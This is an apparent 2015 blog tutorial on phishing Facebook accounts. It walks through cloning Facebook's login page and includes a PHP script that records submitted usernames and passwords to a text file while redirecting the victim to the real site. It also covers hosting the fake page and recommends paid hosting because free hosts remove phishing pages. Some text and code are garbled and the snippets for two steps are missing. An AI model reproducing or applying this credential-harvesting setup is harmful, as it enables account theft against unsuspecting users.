Sunday, 22 March 2015
Facebook Phishing Page - Hacking Facebook account !
Hello guys, it’s been a quite long time I havedelivered you some good stuff, so today I decided towrite about hacking Facebook accounts by phishing.
Generally, phishing is stealing usernames andpasswords using a fake page. Suppose, you want to
hack a victim’s Facebook account, so you create a
page which looks very similar to Facebook and host
it somewhere so that your victim can login. When
the victim tries to log into his account, he is
redirected to the given page and his credentials are
sent to you through an email or simply get recorded
in some text file.
Today we are going to create a Facebook phishing
page using simple HTML and PHP coding. Let’s get
started..!!!
Step 1: Go to http://www.facebook.com and right-
click on the home page and select view page
source.
Copy the complete source code and paste it in
notepad or some other text editor (I use Notepad++)
for further editing.
Step 2: Find for something which looks like this :
Step 3: Then change the action URL to login.php,now it will look similar to this.
Save it as index.html.
Step 4: Open a notepad and paste the following code inside it and save as login.php.
<?php
header (‘Location: http://www.facebook.com’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
Here, the victim will be redirected to http://
www.facebook.com . You can change it to your
desired location by editing the arguments of header
function in the above PHP code.
Step 5: Create another blank text file for storing the
hacked usernames and passwords and name it as
passwords.txt.
asNow you are done with the setup of phishing page,all you need to do is host it somewhere on interneto that it becomes available to your victim.
Step 6: Go to some free hosting site like http://www.000webhost.com & its to simply and easy is www.hostinger.inhta nd sign up for free. You will
be provided with 1.5GB free space to host your web
pages and free domain. You will have to complete
email confirmation step to get your web page running.
Step 7: Once you get your account activated, sign in
and click Go to CPanel as shown below.
Step 8: Then click on File Manager
Step 9: Now you will see a folder public html in the
web based ftp client page, click on the folder and
open it.
Step 10: Click on Upload and select all the 3 files
and finally click on the green tick to upload them as
shown in the image below.
Once you get your files uploaded you can check your
page at your registered domain.
The victim’s password will be automatically written into
passwords.txt file, just open the file to see the
username and password!
Congratulations you are done creating your phishing
page! If you have understood everything perfectly
then you can use this technique to create phishing
pages for other sites also.
Feel free to comment below, I might come up with
an article describing the procedure to host the
webpage on your system. So stay tuned and keep
yourself updated.
Note: Phishing pages at free hosting services will be
immediately deleted, if once detected. So my advice
is to use a paid hosting service or else host it on
your system.
By :- Ashish Limbani
